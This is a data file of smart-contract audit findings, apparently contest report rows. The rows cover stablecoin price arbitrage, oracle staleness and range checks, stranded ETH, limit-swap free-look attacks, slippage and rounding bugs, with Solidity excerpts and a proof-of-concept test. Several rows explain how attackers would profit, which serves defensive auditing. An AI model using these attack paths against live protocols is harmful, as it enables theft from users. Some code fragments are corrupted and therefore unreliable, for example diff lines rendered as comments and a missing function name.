The other way around, trading USDT for USD1, would get you 1.01 USD1 for 1 USDT: $1e6 * 1e18 * 1e18 / (0.99e18 * 1e6) = 1.01e18$\\nThe contract values USD1 at exactly $1 while USDT's price is variable. But, in reality, USD1 is not pegged to $1. It's pegged to USDT the only underlying asset.\\nThat allows us to do the following:\\nWith USDT back to $1 we get: $1.003009e+23 * 1e18 * 1e6 / (1e18 * 1e18) = 100300.9e6$\\nThat's a profit of 300 USDT. The profit is taken from other users of the protocol who deposited USDT to get access to the other stablecoins.",1 USDT should always be 1 USD1. You treat 1 USD1 as $1 but that's not the case.,An attacker can abuse the price variation of USDT to buy USD1 for cheap.,"```\\n address priceQuoteToken = _getPriceQuoteToken(tokenIn, tokenOut);\\n price = oracle.getLatestPrice(priceQuoteToken);\\n _checkPrice(priceQuoteToken, price);\\n\\n feeNumerator = isBuy ? pair.buyFee : pair.sellFee;\\n feeToken = IERC20Token(priceQuoteToken == tokenIn ? tokenOut : tokenIn);\\n\\n SwapRequest memory request;\\n request.tokenIn = tokenIn;\\n request.tokenOut = tokenOut;\\n request.amountType = amountType;\\n request.amount = amount;\\n request.feeNumerator = feeNumerator;\\n request.feeBase = tokenManager.SWAP_FEE_BASE();\\n request.feeToken = address(feeToken);\\n request.price = price;\\n request.priceBase = 10 ** oracle.decimals();\\n request.quoteToken = priceQuoteToken;\\n\\n (amountIn, amountOut, fee) = _calculateSwapResult(request);\\n```\\n" +Users may not be able to fully redeem USD1 into USDT even when reserve ratio is above 100%,medium,"Users may not be able to fully redeem USDT even when reserve ratio is above 100%, because of portfolio being taken into the account for calculation.\\nReserve ratio shows how many liabilities is covered by reserves, a reserve ratio above 100% guarantees protocol has enough USDT to redeem, the way of calculating reserve ratio is `Reserve Ratio = allReserves / liabilities` and is implemented in 
Unitas#_getReserveStatus(...) function:\\n```\\n reserveRatio = ScalingUtils.scaleByBases(\\n allReserves * valueBase / liabilities,\\n valueBase,\\n tokenManager.RESERVE_RATIO_BASE()\\n );\\n```\\n\\n`allReserves` is the sum of the balance of Unitas and InsurancePool, calculated in Unitas#_getTotalReservesAndCollaterals() function:\\n```\\n for (uint256 i; i < tokenCount; i++) {\\n address token = tokenManager.tokenByIndex(tokenTypeValue, i);\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n\\n\\n if (tokenReserve > 0 || tokenCollateral > 0) {\\n uint256 price = oracle.getLatestPrice(token);\\n\\n\\n reserves += _convert(\\n token,\\n baseToken,\\n tokenReserve,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n\\n\\n collaterals += _convert(\\n token,\\n baseToken,\\n tokenCollateral,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n }\\n }\\n```\\n\\n`liabilities` is the total value of USD1 and USDEMC tokens, calculated in Unitas#_getTotalLiabilities() function:\\n```\\n for (uint256 i; i < tokenCount; i++) {\\n address token = tokenManager.tokenByIndex(tokenTypeValue, i);\\n uint256 tokenSupply = IERC20Token(token).totalSupply();\\n\\n\\n if (token == baseToken) {\\n // Adds up directly when the token is USD1\\n liabilities += tokenSupply;\\n } else if (tokenSupply > 0) {\\n uint256 price = oracle.getLatestPrice(token);\\n\\n\\n liabilities += _convert(\\n token,\\n baseToken,\\n tokenSupply,\\n MathUpgradeable.Rounding.Down,\\n price,\\n priceBase,\\n token\\n );\\n }\\n }\\n```\\n\\nSome amount of USDT in both Unitas and InsurancePool is `portfolio`, which represents the current amount of assets used for strategic investments, it is worth noting that after sending `portfolio`, `balance` remains the same, which means `portfolio` is taken into account in the calculation of reserve ratio.\\nThis is problematic because `portfolio` is 
not available when user redeems, and user may not be able to fully redeem for USDT even when protocols says there is sufficient reserve ratio.\\nLet's assume :\\nUnitas's balance is 10000 USD and its portfolio is 2000 USD, avaliable balance is 8000 USD InsurancePool's balance is 3000 USD and its portfolio is 600 USD, available balance is 2400 USD AllReserves value is 13000 USD Liabilities (USDEMC) value is 10000 USD Reserve Ratio is (10000 + 3000) / 10000 = 130%.\\nLater on, USDEMC appreciates upto 10% and we can get:\\nAllReserves value is still 13000 USD Liabilities (USDEMC) value is 11000 USD Reserve Ratio is (10000 + 3000) / 11000 = 118%.\\nThe available balance in Unitas is 8000 USD so there is 3000 USD in short, it needs to be obtain from InsurancePool, however, the available balance in InsurancePool is 2400 USD, transaction will be reverted and users cannot redeem.\\nThere would also be an extreme situation when reserve ratio is above 100% but there is no available `balance` in protocol because all the `balance` is `portfolio` (this is possible when InsurancePool is drained out), users cannot redeem any USDT in this case.","Portfolio should not be taken into account for the calculation of reserve ratio.\\n```\\n function _getTotalReservesAndCollaterals() internal view returns (uint256 reserves, uint256 collaterals) {\\n // rest of code\\n// Remove the line below\\n uint256 tokenReserve = _getBalance(token);\\n// Add the line below\\n uint256 tokenReserve = _getBalance(token) // Remove the line below\\n _getPortfolio(token);\\n// Remove the line below\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n// Add the line below\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token) // Remove the line below\\n IInsurancePool(insurancePool).getPortfolio(token);\\n // rest of code\\n }\\n```\\n","Users may not be able to fully redeem USD1 into USDT even when reserve ratio is above 100%, this defeats the purpose 
of reserve ratio and breaks the promise of the protocol, users may be misled and lose funds.","```\\n reserveRatio = ScalingUtils.scaleByBases(\\n allReserves * valueBase / liabilities,\\n valueBase,\\n tokenManager.RESERVE_RATIO_BASE()\\n );\\n```\\n" +supplyNativeToken will strand ETH in contract if called after ACTION_DEFER_LIQUIDITY_CHECK,high,"supplyNativeToken deposits msg.value to the WETH contract. This is very problematic if it is called after ACTION_DEFER_LIQUIDITY_CHECK. Since onDeferredLiquidityCheck creates a new context msg.value will be 0 and no ETH will actually be deposited for the user, causing funds to be stranded in the contract.\\nTxBuilderExtension.sol#L252-L256\\n```\\nfunction supplyNativeToken(address user) internal nonReentrant {\\n WethInterface(weth).deposit{value: msg.value}();\\n IERC20(weth).safeIncreaseAllowance(address(ironBank), msg.value);\\n ironBank.supply(address(this), user, weth, msg.value);\\n}\\n```\\n\\nsupplyNativeToken uses the context sensitive msg.value to determine how much ETH to send to convert to WETH. 
After ACTION_DEFER_LIQUIDITY_CHECK is called, it enters a new context in which msg.value is always 0. We can outline the execution path to see where this happens:\\n`execute > executeInternal > deferLiquidityCheck > ironBank.deferLiquidityCheck > onDeferredLiquidityCheck (new context) > executeInternal > supplyNativeToken`\\nWhen IronBank makes its callback to TxBuilderExtension it creates a new context. Since the ETH is not sent along to this new context, msg.value will always be 0. Which will result in no ETH being deposited and the sent ether is left in the contract.\\nAlthough these funds can be recovered by the admin, it can easily cause the user to be unfairly liquidated in the meantime since a (potentially significant) portion of their collateral hasn't been deposited. Additionally in conjunction with my other submission on ownable not being initialized correctly, the funds would be completely unrecoverable due to lack of owner.",msg.value should be cached at the beginning of the function to preserve it across contexts,User funds are indefinitely (potentially permanently) stuck in the contract. Users may be unfairly liquidated due to their collateral not depositing.,"```\\nfunction supplyNativeToken(address user) internal nonReentrant {\\n WethInterface(weth).deposit{value: msg.value}();\\n IERC20(weth).safeIncreaseAllowance(address(ironBank), msg.value);\\n ironBank.supply(address(this), user, weth, msg.value);\\n}\\n```\\n" +PriceOracle.getPrice doesn't check for stale price,medium,"PriceOracle.getPrice doesn't check for stale price. 
As a result, the protocol can make decisions based on prices that are not up to date, which can cause losses.\\n```\\n function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, ""invalid price"");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n }\\n```\\n\\nThis function doesn't check that prices are up to date. Because of that it's possible that the price is outdated, which can cause financial losses for the protocol.",You need to check that price is not outdated by checking round timestamp.,Protocol can face bad debt.,"```\\n function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, ""invalid price"");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n }\\n```\\n" +PriceOracle will use the wrong price if the Chainlink registry returns price outside min/max range,medium,"Chainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. 
This is exactly what happened to Venus on BSC when LUNA imploded.\\nNote there is only a check for `price` to be non-negative, and not within an acceptable range.\\n```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, ""invalid price"");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n\\nA similar issue is seen here.","Implement the proper check for each asset. It must revert in the case of bad price.\\n```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price >= minPrice && price <= maxPrice, ""invalid price""); // @audit use the proper minPrice and maxPrice for each asset\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n",The wrong price may be returned in the event of a market crash. An adversary will then be able to borrow against the wrong price and incur bad debt to the protocol.,"```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, ""invalid price"");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n" +Wrong Price will be Returned When Asset is PToken for WstETH,medium,"Iron Bank allows a PToken market to be created for an underlying asset in addition to a lending market. PTokens can be counted as user collaterals and their price is fetched based on their underlying tokens. However, wrong price will return when PToken's underlying asset is WstETH.\\nRetrieving price for WstETH is a 2 step process. 
WstETH needs to be converted to stETH first, then converted to ETH/USD. This is properly implemented when the market is WstETH through checking `if (asset==wsteth)`. But when PToken market is created for WstETH, this check will by bypassed because PToken contract address will be different from wsteth address.\\nPToken market price is set through `_setAggregators()` in PriceOracle.sol where base and quote token address are set and tested before writing into `aggregators` array. And note that quote token address can either be ETH or USD. When asset price is accessed through `getPrice()`, if the input asset is not `wsteth` address, `aggregators` is directly pulled to get chainlink price denominated in ETH or USD.\\n```\\n//PriceOracle.sol\\n//_setAggregators()\\n require(\\n aggrs[i].quote == Denominations.ETH ||\\n aggrs[i].quote == Denominations.USD,\\n ""unsupported quote""\\n );\\n```\\n\\n```\\n//PriceOracle.sol\\n function getPrice(address asset) external view returns (uint256) {\\n if (asset == wsteth) {\\n uint256 stEthPrice = getPriceFromChainlink(\\n steth,\\n Denominations.USD\\n );\\n uint256 stEthPerToken = WstEthInterface(wsteth).stEthPerToken();\\n uint256 wstEthPrice = (stEthPrice * stEthPerToken) / 1e18;\\n return getNormalizedPrice(wstEthPrice, asset);\\n }\\n AggregatorInfo memory aggregatorInfo = aggregators[asset];\\n uint256 price = getPriceFromChainlink(\\n aggregatorInfo.base,\\n aggregatorInfo.quote\\n );\\n // rest of code\\n```\\n\\nThis creates a problem for PToken for WstETH, because `if (asset==wsteth)` will be bypassed and chainlink aggregator price will be returned. And chainlink doesn't have a direct price quote of WstETH/ETH or WstETH/USD, only WstETH/stETH or stETH/USD. 
This means most likely aggregator price for stETH/USD will be returned as price for WstETH.\\nSince stETH is a rebasing token, and WstETH:stETH is not 1 to 1, this will create a wrong valuation for users holding PToken for WstETH as collaterals.","In `getPrice()`, consider adding another check whether the asset is PToken and its underlying asset is WstETH. If true, use the same bypass for pricing.","Since users holding PToken for WstETH will have wrong valuation, this potentially creates opportunities for malicious over-borrowing or unfair liquidations, putting the protocol at risk.","```\\n//PriceOracle.sol\\n//_setAggregators()\\n require(\\n aggrs[i].quote == Denominations.ETH ||\\n aggrs[i].quote == Denominations.USD,\\n ""unsupported quote""\\n );\\n```\\n" +Limit swap orders can be used to get a free look into the future,high,"Users can cancel their limit swap orders to get a free look into prices in future blocks\\nThis is a part of the same issue that was described in the last contest. The sponsor fixed the bug for `LimitDecrease` and `StopLossDecrease`, but not for `LimitSwap`.\\nAny swap limit order submitted in block range N can't be executed until block range N+2, because the block range is forced to be after the submitted block range, and keepers can't execute until the price has been archived, which necessarily won't be until after block range N+1. Consider what happens when half of the oracle's block ranges are off from the other half, e.g.:\\n```\\n 1 2 3 4 5 6 7 8 9 < block number\\nO1: A B B B B C C C D\\nA A B B B B C C C\\n^^ grouped oracle block ranges\\n```\\n\\nAt block 1, oracles in both groups (O1 and O2) are in the same block range A, and someone submits a large swap limit order (N). At block 6, oracles in O1 are in N+2, but oracles in O2 are still in N+1. 
This means that the swap limit order will execute at the median price of block 5 (since the earliest group to have archive prices at block 6 for N+1 will be O1) and market swap order submitted at block 6 in the other direction will execute at the median price of block 6 since O2 will be the first group to archive a price range that will contain block 6. By the end of block 5, the price for O1 is known, and the price that O2 will get at block 6 can be predicted with high probability (e.g. if the price has just gapped a few cents), so a trader will know whether the two orders will create a profit or not. If a profit is expected, they'll submit the market order at block 6. If a loss is expected, they'll cancel the swap limit order from block 1, and only have to cover gas fees.\\nEssentially the logic is that limit swap orders will use earlier prices, and market orders (with swaps) will use later prices, and since oracle block ranges aren't fixed, an attacker is able to know both prices before having their orders executed, and use large order sizes to capitalize on small price differences.",Issue Limit swap orders can be used to get a free look into the future\\nAll orders should follow the same block range rules,"There is a lot of work involved in calculating statistics about block ranges for oracles and their processing time/queues, and ensuring one gets the prices essentially when the keepers do, but this is likely less work than co-located high frequency traders in traditional finance have to do, and if there's a risk free profit to be made, they'll put in the work to do it every single time, at the expense of all other traders.",```\\n 1 2 3 4 5 6 7 8 9 < block number\\nO1: A B B B B C C C D\\nA A B B B B C C C\\n^^ grouped oracle block ranges\\n```\\n +User can loose funds in case if swapping in DecreaseOrderUtils.processOrder will fail,medium,"When user executes decrease order, then he provides `order.minOutputAmount` value, that should protect his from loses. 
This value is provided with hope that swapping that will take some fees will be executed. But in case if swapping will fail, then this `order.minOutputAmount` value will be smaller then user would like to receive in case when swapping didn't occur. Because of that user can receive less output amount.\\n`DecreaseOrderUtils.processOrder` function executed decrease order and returns order execution result which contains information about output tokens and amounts that user should receive.\\n```\\n try params.contracts.swapHandler.swap(\\n SwapUtils.SwapParams(\\n params.contracts.dataStore,\\n params.contracts.eventEmitter,\\n params.contracts.oracle,\\n Bank(payable(order.market())),\\n params.key,\\n result.outputToken,\\n result.outputAmount,\\n params.swapPathMarkets,\\n 0,\\n order.receiver(),\\n order.uiFeeReceiver(),\\n order.shouldUnwrapNativeToken()\\n )\\n ) returns (address tokenOut, uint256 swapOutputAmount) {\\n `(\\n params.contracts.oracle,\\n tokenOut,\\n swapOutputAmount,\\n order.minOutputAmount()\\n );\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n _handleSwapError(\\n params.contracts.oracle,\\n order,\\n result,\\n reason,\\n reasonBytes\\n );\\n }\\n }\\n```\\n\\n```\\n null(\\n Oracle oracle,\\n Order.Props memory order,\\n DecreasePositionUtils.DecreasePositionResult memory result,\\n string memory reason,\\n bytes memory reasonBytes\\n ) internal {\\n emit SwapUtils.SwapReverted(reason, reasonBytes);\\n\\n _validateOutputAmount(\\n oracle,\\n result.outputToken,\\n result.outputAmount,\\n order.minOutputAmount()\\n );\\n\\n MarketToken(payable(order.market())).transferOut(\\n result.outputToken,\\n order.receiver(),\\n result.outputAmount,\\n order.shouldUnwrapNativeToken()\\n );\\n }\\n```\\n\\nAs you can see in this case `_validateOutputAmount` function will be called as well, but it will be called with `result.outputAmount` this time, which is 
amount provided by decreasing of position.\\nNow I will describe the problem. In case if a user wants to swap his token, he knows that he needs to pay fees to the market pools and that this swap will eat some amount of output. So in case if `result.outputAmount` is 100$ worth of tokenA, it's fine if the user will provide slippage as 3% if he has a long swap path, so his slippage is 97$. But in case when the swap will fail, then now this slippage of 97$ is incorrect as the user didn't do swapping and he should receive exactly 100$ worth of tokenA.\\nAlso I should note here, that it's easy for the keeper to make the swap fail, it's enough for him to just not provide any asset price, so the swap reverts. So the keeper can benefit from this slippage issue.","Issue User can lose funds in case if swapping in DecreaseOrderUtils.processOrder will fail\\nMaybe it's needed to have another slippage param that should be used in case of no swapping.",User can be front-run and receive a smaller amount in case of a swapping error.,"```\\n try params.contracts.swapHandler.swap(\\n SwapUtils.SwapParams(\\n params.contracts.dataStore,\\n params.contracts.eventEmitter,\\n params.contracts.oracle,\\n Bank(payable(order.market())),\\n params.key,\\n result.outputToken,\\n result.outputAmount,\\n params.swapPathMarkets,\\n 0,\\n order.receiver(),\\n order.uiFeeReceiver(),\\n order.shouldUnwrapNativeToken()\\n )\\n ) returns (address tokenOut, uint256 swapOutputAmount) {\\n _validateOutputAmount(\\n params.contracts.oracle,\\n tokenOut,\\n swapOutputAmount,\\n order.minOutputAmount()\\n );\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n _handleSwapError(\\n params.contracts.oracle,\\n order,\\n result,\\n reason,\\n reasonBytes\\n );\\n }\\n }\\n```\\n"
+MarketUtils.getFundingAmountPerSizeDelta() has a rounding logical error.,medium,"`MarketUtils.getFundingAmountPerSizeDelta()` has a rounding logical error. 
The main problem is that the divisor always uses a roundupDivision regardless of the input `roundUp` rounding mode. Actually, the correct use should be: the divisor should use the opposite of `roundup` to achieve the same logic of rounding.\\n`MarketUtils.getFundingAmountPerSizeDelta()` is used to calculate the `FundingAmountPerSizeDelta` with a roundup input mode parameter.\\nThis function is used for example by the IncreaseLimit order via flow `OrderHandler.executeOrder() -> _executeOrder() -> OrderUtils.executeOrder() -> processOrder() -> IncreaseOrderUtils.processOrder() -> IncreasePositionUtils.increasePosition() -> PositionUtils.updateFundingAndBorrowingState() -> MarketUtils.updateFundingAmoutPerSize() -> getFundingAmountPerSizeDelta()`.\\nHowever, the main problem is that the divisor always uses a roundupDivision regardless of the input `roundUp` rounding mode. Actually, the correct use should be: the divisor should use the opposite of `roundup` to achieve the same logic of rounding.\\nMy POC code confirms my finding: given fundingAmount = 2e15, openInterest = 1e15+1, and roundup = true, the correct answer should be: 1999999999999998000000000000001999999999999999. However, the implementation returns the wrong solution of: 1000000000000000000000000000000000000000000000. The reason is that the divisor uses a roundup and gets a divisor of 2, as a result, the final result is actually rounded down rather than rounded up!\\n```\\nfunction testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(""result: %d"", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(""correctResult: %d"", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n```\\n","Change the rounding mode of the divisor to the opposite of the input `roundup` mode. 
Or, the solution can be just as follows:\\n```\\nfunction getFundingAmountPerSizeDelta(\\n uint256 fundingAmount,\\n uint256 openInterest,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n if (fundingAmount == 0 || openInterest == 0) { return 0; }\\n \\n \\n\\n // how many units in openInterest\\n// Remove the line below\\n uint256 divisor = Calc.roundUpDivision(openInterest, Precision.FLOAT_PRECISION_SQRT);\\n\\n// Remove the line below\\n return Precision.toFactor(fundingAmount, divisor, roundUp);\\n// Add the line below\\n return Precision.toFactor(fundingAmount*Precision.FLOAT_PRECISION_SQRT, openInterest, roundUp\\n }\\n```\\n","MarketUtils.getFundingAmountPerSizeDelta() has a rounding logical error, sometimes, when roundup = true, the result, instead of rounding up, it becomes a rounding down!","```\\nfunction testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(""result: %d"", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(""correctResult: %d"", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n```\\n" +"PositionUtils.validatePosition() uses ``isIncrease`` instead of ``false`` when calling isPositionLiquidatable(), making it not work properly for the case of ``isIncrease = true``.",medium,"`PositionUtils.validatePosition()` uses `isIncrease` instead of `false` when calling `isPositionLiquidatable()`, making it not work properly for the case of `isIncrease` = true. The main problem is that when calling `isPositionLiquidatable()`, we should always consider decreasing the position since we are proposing a liquidation trade (which is a decrease in position). Therefore, it should not use `isIncrease` for the input parameter for `isPositionLiquidatable()`. 
We should always use `false` instead.\\n`PositionUtils.validatePosition()` is called to validate whether a position is valid in both collateral size and position size, and in addition, to check if the position is liquidatable:\\nIt calls function `isPositionLiquidatable()` to check if a position is liquidatable. However, it passes the `isIncrease` to function `isPositionLiquidatable()` as an argument. Actually, the `false` value should always be used for calling function `isPositionLiquidatable()` since a liquidation is always a decrease position operation. Whether a position is liquidatable or not has nothing to do with exiting trade operations and only depends on the parameters of the position per se.\\nThe current implementation has a problem for an increase order: Given an Increase order, for example, increase a position by $200, when `PositionUtils.validatePosition()` is called, which is after the position has been increased, we should not consider another $200 increase in `isPositionLiquidatable()` again as part of the price impact calculation. This is double-accounting for the price impact calculation, one during the position increasing process, and another in the position validation process. On the other hand, if we use `false` here, then we are considering a decrease order (since a liquidation is a decrease order) and evaluate the hypothetical price impact if the position will be liquidated.\\nOur POC code confirms my finding: initially, we don't have any positions; after executing a LimitIncrease order, the priceImpactUsd is evaluated as follows (notice initialDiffUsd = 0):\\nPositionPricingUtils.getPriceImpactUsd started... 
openInterestParams.longOpenInterest: 0 openInterestParams.shortOpenInterest: 0 initialDiffUsd: 0 nextDiffUsd: 1123456700000000000000000000000 positiveImpactFactor: 50000000000000000000000 negativeImpactFactor: 100000000000000000000000 positiveImpactUsd: 0 negativeImpactUsd: 63107747838744499100000 deltaDiffUsd: 63107747838744499100000 priceImpactUsd: -63107747838744499100000 PositionPricingUtils.getPriceImpactUsd() completed. Initial priceImpactUsd: -63107747838744499100000 Capped priceImpactUsd: -63107747838744499100000\\nThen, during validation, when `PositionUtils.validatePosition()` is called, the double accounting occurs; notice the `nextDiffUsd` is doubled, as if the limitOrder was executed a second time!\\nPositionPricingUtils.getPriceImpactUsd started... openInterestParams.longOpenInterest: 1123456700000000000000000000000 openInterestParams.shortOpenInterest: 0 initialDiffUsd: 1123456700000000000000000000000 nextDiffUsd: 2246913400000000000000000000000 impactFactor: 100000000000000000000000 impactExponentFactor: 2000000000000000000000000000000 deltaDiffUsd: 189323243516233497450000 priceImpactUsd: -189323243516233497450000 priceImpactUsd: -189323243516233497450000 adjusted 2: priceImpactUsd: 0
Please comment out the checks for signature, timestamp and block number for oracle price in the source code to run the testing smoothly without revert.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../contracts/role/RoleStore.sol"";\\nimport ""../contracts/router/ExchangeRouter.sol"";\\nimport ""../contracts/data/DataStore.sol"";\\nimport ""../contracts/referral/ReferralStorage.sol"";\\n\\nimport ""../contracts/token/IWNT.sol"";\\nimport ""../contracts/token/WNT.sol"";\\nimport ""../contracts/token/SOLToken.sol"";\\nimport ""../contracts/token/USDC.sol"";\\nimport ""../contracts/token/tokenA.sol"";\\nimport ""../contracts/token/tokenB.sol"";\\nimport ""../contracts/token/tokenC.sol"";\\n\\nimport ""../contracts/market/MarketFactory.sol"";\\nimport ""../contracts/deposit/DepositUtils.sol"";\\nimport ""../contracts/oracle/OracleUtils.sol"";\\nimport ""@openzeppelin/contracts/utils/introspection/ERC165Checker.sol"";\\nimport ""../contracts/withdrawal/WithdrawalUtils.sol"";\\nimport ""../contracts/order/Order.sol"";\\nimport ""../contracts/order/BaseOrderUtils.sol"";\\nimport ""../contracts/price/Price.sol"";\\nimport ""../contracts/utils/Debug.sol"";\\nimport ""../contracts/position/Position.sol"";\\nimport ""../contracts/exchange/LiquidationHandler.sol"";\\nimport ""../contracts/utils/Calc.sol"";\\nimport ""@openzeppelin/contracts/utils/math/SignedMath.sol"";\\nimport ""@openzeppelin/contracts/utils/math/SafeCast.sol"";\\n\\n\\ncontract CounterTest is Test, Debug{\\n using SignedMath for int256;\\n using SafeCast for uint256;\\n\\n\\n WNT _wnt; \\n USDC _usdc;\\n SOLToken _sol;\\n tokenA _tokenA;\\n tokenB _tokenB;\\n tokenC _tokenC;\\n\\n RoleStore _roleStore;\\n Router _router;\\n DataStore _dataStore;\\n EventEmitter _eventEmitter;\\n DepositVault _depositVault;\\n OracleStore _oracleStore; \\n Oracle _oracle;\\n DepositHandler _depositHandler;\\n WithdrawalVault _withdrawalVault;\\n 
WithdrawalHandler _withdrawalHandler;\\n OrderHandler _orderHandler;\\n SwapHandler _swapHandler;\\n LiquidationHandler _liquidationHandler;\\n ReferralStorage _referralStorage;\\n OrderVault _orderVault;\\n ExchangeRouter _erouter;\\n MarketFactory _marketFactory;\\n Market.Props _marketProps1;\\n Market.Props _marketPropsAB;\\n Market.Props _marketPropsBC;\\n Market.Props _marketPropsCwnt;\\n \\n \\n address depositor1;\\n address depositor2;\\n address depositor3;\\n address uiFeeReceiver = address(333);\\n\\n\\n function testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(""result: %d"", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(""correctResult: %d"", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n\\n \\n\\n function setUp() public {\\n _wnt = new WNT();\\n _usdc = new USDC();\\n _sol = new SOLToken();\\n _tokenA = new tokenA();\\n _tokenB = new tokenB();\\n _tokenC = new tokenC();\\n \\n\\n\\n _roleStore = new RoleStore();\\n _router = new Router(_roleStore);\\n _dataStore = new DataStore(_roleStore);\\n \\n _eventEmitter= new EventEmitter(_roleStore);\\n _depositVault = new DepositVault(_roleStore, _dataStore);\\n _oracleStore = new OracleStore(_roleStore, _eventEmitter);\\n _oracle = new Oracle(_roleStore, _oracleStore);\\n console2.logString(""_oracle:""); console2.logAddress(address(_oracle));\\n \\n _depositHandler = new DepositHandler(_roleStore, _dataStore, _eventEmitter, _depositVault, _oracle);\\n console2.logString(""_depositHandler:""); console2.logAddress(address(_depositHandler));\\n \\n\\n _withdrawalVault = new WithdrawalVault(_roleStore, _dataStore);\\n _withdrawalHandler = new WithdrawalHandler(_roleStore, _dataStore, _eventEmitter, _withdrawalVault, _oracle);\\n \\n \\n _swapHandler = new SwapHandler(_roleStore);\\n _orderVault = new 
OrderVault(_roleStore, _dataStore);\\n _referralStorage = new ReferralStorage();\\n\\n\\n \\n _orderHandler = new OrderHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage); \\n _erouter = new ExchangeRouter(_router, _roleStore, _dataStore, _eventEmitter, _depositHandler, _withdrawalHandler, _orderHandler);\\n console2.logString(""_erouter:""); console2.logAddress(address(_erouter));\\n _liquidationHandler = new LiquidationHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage);\\n \\n _referralStorage.setHandler(address(_orderHandler), true); \\n\\n /* set myself as the controller so that I can set the address of WNT (wrapped native token contracdt) */\\n _roleStore.grantRole(address(this), Role.CONTROLLER);\\n _roleStore.grantRole(address(this), Role.MARKET_KEEPER);\\n \\n _dataStore.setUint(Keys.MAX_SWAP_PATH_LENGTH, 5); // at most 5 markets in the path\\n \\n _dataStore.setAddress(Keys.WNT, address(_wnt));\\n\\n /* set the token transfer gas limit for wnt as 3200 */\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n \\n\\n /* create a market (SQL, WNT, ETH, USDC) */\\n _marketFactory = new MarketFactory(_roleStore, _dataStore, _eventEmitter);\\n console2.logString(""_marketFactory:""); console2.logAddress(address(_marketFactory));\\n _roleStore.grantRole(address(_marketFactory), Role.CONTROLLER); // to save a market's props\\n _roleStore.grantRole(address(_erouter), Role.CONTROLLER); \\n _roleStore.grantRole(address(_depositHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_withdrawalHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_swapHandler), Role.CONTROLLER);\\n _roleStore.grantRole(address(_orderHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_liquidationHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_oracleStore), 
